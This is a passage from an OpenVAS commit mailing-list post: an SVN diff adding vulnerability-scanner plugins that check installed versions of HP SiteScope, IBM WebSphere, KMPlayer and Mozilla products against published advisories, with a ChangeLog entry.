[Openvas-commits] r11594 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Fri Sep 9 17:36:57 CEST 2011


Author: veerendragg
Date: 2011-09-09 17:36:48 +0200 (Fri, 09 Sep 2011)
New Revision: 11594

Added:
   trunk/openvas-plugins/scripts/gb_hp_sitescope_xss_n_session_fixation_vuln.nasl
   trunk/openvas-plugins/scripts/gb_ibm_was_admin_console_dir_trav_vuln.nasl
   trunk/openvas-plugins/scripts/gb_kmplayer_kpl_file_bof_vuln.nasl
   trunk/openvas-plugins/scripts/gb_mozilla_firefox_untrusted_search_path_vuln_win.nasl
   trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win.nasl
   trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win01.nasl
   trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win02.nasl
   trunk/openvas-plugins/scripts/gb_mozilla_prdts_sec_bypass_n_info_disc_vuln_win.nasl
   trunk/openvas-plugins/scripts/gb_mozilla_prdts_svg_code_exec_vuln_win.nasl
   trunk/openvas-plugins/scripts/gb_ms_win_fraudulent_digital_cert_spoofing_vuln.nasl
   trunk/openvas-plugins/scripts/gb_myauth3_gateway_blind_sql_inj_vuln.nasl
   trunk/openvas-plugins/scripts/gb_myre_real_estate_mult_xss_n_sql_inj_vuln.nasl
   trunk/openvas-plugins/scripts/gb_opera_extented_validation_info_disc_vuln_macosx.nasl
   trunk/openvas-plugins/scripts/gb_opera_extented_validation_info_disc_vuln_win.nasl
   trunk/openvas-plugins/scripts/gb_pidgin_libpurple_protocol_plugins_dos_vuln_win.nasl
   trunk/openvas-plugins/scripts/gb_search_network_xss_vuln.nasl
   trunk/openvas-plugins/scripts/gb_xadataface_webauction_n_librariandb_mult_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_nfs_rpc_statd_mult_format_string_vuln.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/scripts/gb_apple_quicktime_mult_bof_vuln_win.nasl
   trunk/openvas-plugins/scripts/gb_thunderbird_detect_win.nasl
Log:
Added new plugins. Updated reference and Added security_note.

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/ChangeLog	2011-09-09 15:36:48 UTC (rev 11594)
@@ -1,3 +1,29 @@
+2011-09-09  Veerendra G.G <veerendragg at secpod.com>
+
+	* scripts/gb_pidgin_libpurple_protocol_plugins_dos_vuln_win.nasl,
+	scripts/gb_mozilla_prdts_mult_vuln_sep11_win01.nasl,
+	scripts/gb_ibm_was_admin_console_dir_trav_vuln.nasl,
+	scripts/gb_kmplayer_kpl_file_bof_vuln.nasl,
+	scripts/gb_myre_real_estate_mult_xss_n_sql_inj_vuln.nasl,
+	scripts/gb_mozilla_prdts_mult_vuln_sep11_win02.nasl,
+	scripts/gb_search_network_xss_vuln.nasl,
+	scripts/gb_hp_sitescope_xss_n_session_fixation_vuln.nasl,
+	scripts/gb_opera_extented_validation_info_disc_vuln_macosx.nasl,
+	scripts/secpod_nfs_rpc_statd_mult_format_string_vuln.nasl,
+	scripts/gb_mozilla_firefox_untrusted_search_path_vuln_win.nasl,
+	scripts/gb_mozilla_prdts_mult_vuln_sep11_win.nasl,
+	scripts/gb_xadataface_webauction_n_librariandb_mult_vuln.nasl,
+	scripts/gb_mozilla_prdts_svg_code_exec_vuln_win.nasl,
+	scripts/gb_myauth3_gateway_blind_sql_inj_vuln.nasl,
+	scripts/gb_mozilla_prdts_sec_bypass_n_info_disc_vuln_win.nasl,
+	scripts/gb_opera_extented_validation_info_disc_vuln_win.nasl,
+	scripts/gb_ms_win_fraudulent_digital_cert_spoofing_vuln.nasl:
+	Added new plugins.
+
+	* scripts/gb_thunderbird_detect_win.nasl,
+	scripts/gb_apple_quicktime_mult_bof_vuln_win.nasl:
+	Updated reference and Added security_note. 
+
 2011-09-09  Michael Meyer <michael.meyer at greenbone.net>
 
 	* scripts/gb_tomcat_48667.nasl,

Modified: trunk/openvas-plugins/scripts/gb_apple_quicktime_mult_bof_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_apple_quicktime_mult_bof_vuln_win.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_apple_quicktime_mult_bof_vuln_win.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -31,8 +31,8 @@
   script_cve_id("CVE-2011-0245", "CVE-2011-0246", "CVE-2011-0247",
                 "CVE-2011-0248", "CVE-2011-0249", "CVE-2011-0250",
                 "CVE-2011-0251", "CVE-2011-0252", "CVE-2011-0256",
-                "CVE-2011-0257");
-  script_bugtraq_id(49028, 49029, 49030, 49031, 49144);
+                "CVE-2011-0257", "CVE-2011-0258");
+  script_bugtraq_id(49028, 49029, 49030, 49031, 49144, 49396);
   script_tag(name:"cvss_base", value:"9.3");
   script_tag(name:"risk_factor", value:"Critical");
   script_name("Apple QuickTime Multiple Buffer Overflow Vulnerabilities (Windows)");
@@ -51,6 +51,7 @@
     of 'QTL' files.
   - an integer overflow existed in the handling of track run atoms in
     QuickTime movie files.
+  - improper bounds checking when handling 'mp4v' codec information.
 
   Impact:
   Successful exploitation could allow attackers to execute arbitrary code in

Added: trunk/openvas-plugins/scripts/gb_hp_sitescope_xss_n_session_fixation_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_hp_sitescope_xss_n_session_fixation_vuln.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_hp_sitescope_xss_n_session_fixation_vuln.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,116 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_hp_sitescope_xss_n_session_fixation_vuln.nasl 16416 2011-09-07 10:35:01Z sep $
+#
+# HP SiteScope Cross-Site Scripting and Session Fixation Vulnerabilities
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801976);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-2400", "CVE-2011-2401");
+  script_bugtraq_id(48916, 48913);
+  script_tag(name:"cvss_base", value:"9.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("HP SiteScope Cross-Site Scripting and Session Fixation Vulnerabilities");
+  desc = "
+  Overview: This host is running HP SiteScope and is prone to cross-site
+  scripting and session fixation vulnerabilities.
+
+  Vulnerability Insight:
+  Multiple flaws are due to,
+  - Certain unspecified input is not properly sanitised before being returned
+    to the user. This can be exploited to execute arbitrary HTML and script
+    code in a user's browser session in context of an affected site.
+  - An error in the handling of sessions can be exploited to hijack another
+    user's session by tricking the user into logging in after following a
+    specially crafted link.
+
+  Impact:
+  Successful exploitation could allow execution of scripts or actions written
+  by an attacker. In addition, an attacker may conduct session fixation attacks
+  to hijack the target user's session.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  HP SiteScope version 9.x, 10.x, and 11.x
+
+  Fix: Apply the patch from below link,
+  For updates refer, http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02940969
+
+  *****
+  NOTE : Ignore this warning if above mentioned patch is applied already.
+  *****
+
+  References:
+  http://osvdb.org/74113
+  http://secunia.com/advisories/45440
+  http://securitytracker.com/id?1025856
+  http://xforce.iss.net/xforce/xfdb/68867
+  http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02940969 ";
+
+  script_description(desc);
+  script_summary("Determine if installed SiteScope version is vulnerable");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Web application abuses");
+  script_dependencies("find_service.nes", "http_version.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+## Get the server banner
+banner = get_http_banner(port:port);
+if(!banner){
+  exit(0);
+}
+
+## Confirm the server
+if("Server: SiteScope/" >!< banner){
+  exit(0);
+}
+
+## Match the version
+version = eregmatch(pattern:"Server: SiteScope/([^ ]+)", string:banner);
+if(isnull(version[1])){
+  exit(0);
+}
+
+## Check for the version 9.x, 10.x, and 11.x
+if(version_is_less_equal(version:version[1], test_version:"9.54") ||
+   version_in_range(version:version[1], test_version:"11.0", test_version2:"11.10") ||
+   version_in_range(version:version[1], test_version:"10.0", test_version2:"10.14")) {
+  security_warning(port:port);
+}

Added: trunk/openvas-plugins/scripts/gb_ibm_was_admin_console_dir_trav_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ibm_was_admin_console_dir_trav_vuln.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_ibm_was_admin_console_dir_trav_vuln.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,97 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ibm_was_admin_console_dir_trav_vuln.nasl 17027 2011-09-08 13:13:13Z sep $
+#
+# IBM WebSphere Application Server Administration Directory Traversal Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801977);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-1359");
+  script_bugtraq_id(49362);
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("IBM WebSphere Application Server Administration Directory Traversal Vulnerability");
+  desc = "
+  Overview: The host is running IBM WebSphere Application Server and is prone
+  to directory traversal vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to error in administration console which fails to
+  handle certain requests. This allows remote attackers to read arbitrary
+  files via a '../' (dot dot) in the URI.
+
+  Impact:
+  Successful exploitation will allow attackers to read arbitrary files on the
+  affected application and obtain sensitive information that may lead to
+  further attacks.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  IBM WebSphere Application Server versions 6.1 before 6.1.0.41,
+  7.0 before 7.0.0.19 and 8.0 before 8.0.0.1
+
+  Fix: Upgrade IBM WebSphere Application Server to 6.1.0.41 or 7.0.0.19 or
+  8.0.0.1
+  For updates refer, http://www-01.ibm.com/support/docview.wss?uid=swg24028875
+
+  References:
+  http://osvdb.org/74817
+  http://secunia.com/advisories/45749
+  http://xforce.iss.net/xforce/xfdb/69473
+  http://www-01.ibm.com/support/docview.wss?uid=swg21509257 ";
+
+  script_description(desc);
+  script_summary("Check for the version of IBM WebSphere Application Server");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Web Servers");
+  script_dependencies("gb_ibm_websphere_detect.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!get_port_state(port)){
+  exit(0);
+}
+
+## Get Version from KB
+vers = get_kb_item(string("www/", port, "/websphere_application_server"));
+if(isnull(vers)){
+  exit(0);
+}
+
+## Check for IBM WebSphere Application Server versions
+if(version_is_equal(version: vers, test_version:"8.0.0.0") ||
+   version_in_range(version: vers, test_version: "6.1", test_version2: "6.1.0.40") ||
+   version_in_range(version: vers, test_version: "7.0", test_version2: "7.0.0.18")){
+  security_warning(port:port);
+}


Property changes on: trunk/openvas-plugins/scripts/gb_ibm_was_admin_console_dir_trav_vuln.nasl
___________________________________________________________________
Name: svn:executable
   + *

Added: trunk/openvas-plugins/scripts/gb_kmplayer_kpl_file_bof_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_kmplayer_kpl_file_bof_vuln.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_kmplayer_kpl_file_bof_vuln.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,113 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_kmplayer_kpl_file_bof_vuln.nasl 16971 2011-09-08 15:14:14Z sep $
+#
+# KMPlayer '.kpl' File 'Title' Field Remote Buffer Overflow Vulnerability
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802154);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-2594");
+  script_bugtraq_id(49342);
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("KMPlayer '.kpl' File 'Title' Field Remote Buffer Overflow Vulnerability");
+  desc = "
+  Overview: This host is installed with KMPlayer and is prone to buffer
+  overflow vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to improper bounds checking when parsing the 'Title'
+  entry within play list files.
+
+  Impact:
+  Successful exploitation allows attackers to overflow a buffer and execute
+  arbitrary code on the system or cause the application to crash.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  KMPlayer versions 3.0.0.1441 and prior.
+
+  Fix: No solution or patch is available as on 8th September, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.kmplayer.com/
+
+  References:
+  http://secunia.com/advisories/45264
+  http://xforce.iss.net/xforce/xfdb/69451 ";
+
+  script_description(desc);
+  script_summary("Check for the version of KMPlayer");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Buffer overflow");
+  script_dependencies("secpod_reg_enum.nasl");
+  script_require_keys("SMB/WindowsVersion");
+  script_require_ports(139, 445);
+  exit(0);
+}
+
+
+include("smb_nt.inc");
+include("version_func.inc");
+include("secpod_smb_func.inc");
+
+## Confirm Windows
+if(!get_kb_item("SMB/WindowsVersion")){
+  exit(0);
+}
+
+if(!registry_key_exists(key:"SOFTWARE\KMPlayer")){
+  exit(0);
+}
+
+## Confirm Application
+key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\The KMPlayer";
+if(!registry_key_exists(key:key)){
+  exit(0);
+}
+
+kmName = registry_get_sz(key:key, item:"DisplayName");
+if("KMPlayer" >< kmName)
+{
+  ## Get the path of uninstallstring
+  kmPath = registry_get_sz(key:key + item, item:"UninstallString");
+  if(kmPath)
+  {
+    kmPath = ereg_replace(pattern:'\"(.*)\"', replace:"\1", string:kmPath);
+    kmPath = ereg_replace(pattern:'uninstall.exe', replace:"KMPlayer.exe", string:kmPath);
+
+    ## Get Version from KMPlayer.exe
+    kmVer = fetch_file_version(sysPath:kmPath);
+    if(! kmVer){
+      exit(0);
+    }
+
+    ## Check for KMPlayer versions 3.0.0.1441 and prior.
+    if(version_is_less_equal(version:kmVer, test_version:"3.0.0.1441")){
+      security_hole(0);
+    }
+  }
+}

Added: trunk/openvas-plugins/scripts/gb_mozilla_firefox_untrusted_search_path_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mozilla_firefox_untrusted_search_path_vuln_win.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_mozilla_firefox_untrusted_search_path_vuln_win.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_mozilla_firefox_untrusted_search_path_vuln_win.nasl 16832 2011-09-05 19:15:33Z sep $
+#
+# Mozilla Firefox Untrusted Search Path Vulnerability (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802149);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-2980");
+  script_bugtraq_id(49217);
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Mozilla Firefox Untrusted Search Path Vulnerability (Windows)");
+  desc = "
+  Overview: The host is installed with Mozilla firefox and is prone to
+  untrusted search path vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to error in 'ThinkPadSensor::Startup' allows local
+  users to gain privileges by leveraging write access in an unspecified
+  directory to place a Trojan horse DLL that is loaded into the running
+  Firefox process.
+
+  Impact:
+  Successful exploitation will let attackers to execute arbitrary code in the
+  context of the affected application.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  Mozilla Firefox version before 3.6.20
+
+  Fix: Upgrade to Mozilla Firefox version 3.6.20 or later,
+  For updates refer, http://www.mozilla.com/en-US/firefox/all.html
+
+  References:
+  http://www.mozilla.org/security/announce/2011/mfsa2011-30.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of Mozilla Firefox");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("General");
+  script_dependencies("gb_firefox_detect_win.nasl");
+  script_require_keys("Firefox/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+# Firefox Check
+ffVer = get_kb_item("Firefox/Win/Ver");
+if(ffVer)
+{
+  # Grep for Firefox version
+  if(version_is_less(version:ffVer, test_version:"3.6.20")){
+     security_hole(0);
+     exit(0);
+  }
+}

Added: trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,116 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_mozilla_prdts_mult_vuln_sep11_win.nasl 16832 2011-09-05 19:15:33Z sep $
+#
+# Mozilla Products Multiple Vulnerabilities (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802150);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-2981", "CVE-2011-2984", "CVE-2011-2378");
+  script_bugtraq_id(49218, 49219, 49214);
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Mozilla Products Multiple Vulnerabilities (Windows)");
+  desc = "
+  Overview: The host is installed with Mozilla firefox/seamonkey/thunderbird
+  and is prone to multiple vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are caused due to,
+  - An error in the 'event-management' implementation, which fails to select
+    the context for script to run in.
+  - Improper handling of the dropping of a tab element.
+  - An error in 'appendChild()' function, which fails to handle DOM objects.
+
+  Impact:
+  Successful exploitation will let attackers to execute arbitrary code in the
+  context of the affected application. Failed exploit attempts will likely
+  result in denial-of-service conditions.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  SeaMonkey version 2.0 through 2.2
+  Mozilla Firefox version before 3.6.20
+  Thunderbird version 3.0 through 3.1.11
+
+  Fix: Upgrade to Mozilla Firefox version 3.6.20 or later,
+  For updates refer, http://www.mozilla.com/en-US/firefox/all.html
+
+  Upgrade to SeaMonkey version to 2.3 or later
+  http://www.mozilla.org/projects/seamonkey/
+
+  References:
+  http://secunia.com/advisories/45666/
+  http://www.mozilla.org/security/announce/2011/mfsa2011-30.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of Mozilla Firefox/SeaMonkey/Thunderbird");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("General");
+  script_dependencies("gb_firefox_detect_win.nasl",
+                      "gb_seamonkey_detect_win.nasl",
+                      "gb_thunderbird_detect_win.nasl");
+  script_require_keys("Firefox/Win/Ver", "Seamonkey/Win/Ver",
+                      "Thunderbird/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+# Firefox Check
+ffVer = get_kb_item("Firefox/Win/Ver");
+if(ffVer)
+{
+  # Grep for Firefox version
+  if(version_is_less(version:ffVer, test_version:"3.6.20")){
+     security_hole(0);
+     exit(0);
+  }
+}
+
+# SeaMonkey Check
+seaVer = get_kb_item("Seamonkey/Win/Ver");
+if(seaVer)
+{
+  # Grep for SeaMonkey version
+  if(version_in_range(version:seaVer, test_version:"2.0", test_version2:"2.2"))
+  {
+     security_hole(0);
+     exit(0);
+  }
+}
+
+# Thunderbird Check
+tbVer = get_kb_item("Thunderbird/Win/Ver");
+if(tbVer != NULL)
+{
+  # Grep for Thunderbird version
+  if(version_in_range(version:tbVer, test_version:"3.0", test_version2:"3.1.11")){
+    security_hole(0);
+  }
+}

Added: trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win01.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win01.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win01.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,122 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_mozilla_prdts_mult_vuln_sep11_win01.nasl 16832 2011-09-06 11:15:33Z sep $
+#
+# Mozilla Products Multiple Vulnerabilities - Sep 11 (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802151);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-2982", "CVE-2011-2983");
+  script_bugtraq_id(49216, 49223);
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Mozilla Products Multiple Vulnerabilities - Sep 11 (Windows)");
+  desc = "
+  Overview: The host is installed with Mozilla firefox/thunderbird/seamonkey
+  and is prone to multiple unspecified vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are caused due to,
+  - Unspecified errors in the browser engine in mozilla products.
+  - Improperly handling of the 'RegExp.input' property, which allows remote
+    attackers to bypass the same origin policy and read data from a different
+    domain via a crafted web site.
+
+  Impact:
+  Successful exploitation will allow attackers to execute arbitrary code in
+  the context of the user running an affected application. Failed exploit
+  attempts will result in a denial-of-service condition.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  Mozilla Firefox version before 3.6.20
+  SeaMonkey version 1.x and 2.0 through 2.2
+  Thunderbird version 2.x and 3.0 through 3.1.11
+
+  Fix: Upgrade to Mozilla Firefox version 3.6.20 or later,
+  For updates refer, http://www.mozilla.com/en-US/firefox/all.html
+
+  Upgrade to SeaMonkey version to 2.3 or later
+  http://www.mozilla.org/projects/seamonkey/
+
+  Upgrade to Thunderbird version to 3.1.12 or later
+  http://www.mozilla.org/en-US/thunderbird/
+
+  References:
+  http://secunia.com/advisories/45666/
+  http://support.avaya.com/css/P8/documents/100146973
+  http://www.mozilla.org/security/announce/2011/mfsa2011-30.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of Mozilla Firefox/Thunderbird/SeaMonkey");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("General");
+  script_dependencies("gb_firefox_detect_win.nasl",
+                      "gb_seamonkey_detect_win.nasl",
+                      "gb_thunderbird_detect_win.nasl");
+  script_require_keys("Firefox/Win/Ver", "Seamonkey/Win/Ver",
+                       "Thunderbird/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+# Firefox Check
+ffVer = get_kb_item("Firefox/Win/Ver");
+if(ffVer)
+{
+  # Grep for Firefox version
+  if(version_is_less(version:ffVer, test_version:"3.6.20")){
+     security_hole(0);
+     exit(0);
+  }
+}
+
+# SeaMonkey Check
+seaVer = get_kb_item("Seamonkey/Win/Ver");
+if(seaVer)
+{
+  # Grep for SeaMonkey version
+  if((seaVer =~ "^1\.*")||
+     version_in_range(version:seaVer, test_version:"2.0", test_version2:"2.2"))
+  {
+     security_hole(0);
+     exit(0);
+  }
+}
+
+# Thunderbird Check
+tbVer = get_kb_item("Thunderbird/Win/Ver");
+if(tbVer != NULL)
+{
+  # Grep for Thunderbird version
+  if((tbVer =~ "^2\.*")||
+      version_in_range(version:tbVer, test_version:"3.0", test_version2:"3.1.11")){
+    security_hole(0);
+  }
+}

Added: trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win02.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win02.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win02.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,124 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_mozilla_prdts_mult_vuln_sep11_win02.nasl 16832 2011-09-06 12:15:33Z sep $
+#
+# Mozilla Products Multiple Vulnerabilities - Sep 11 (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802153);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-2985", "CVE-2011-2986", "CVE-2011-2987",
+                "CVE-2011-2988", "CVE-2011-2989", "CVE-2011-2991",
+                "CVE-2011-2992");
+  script_bugtraq_id(49224, 49227, 49226, 49242, 49239, 49243, 49245);
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
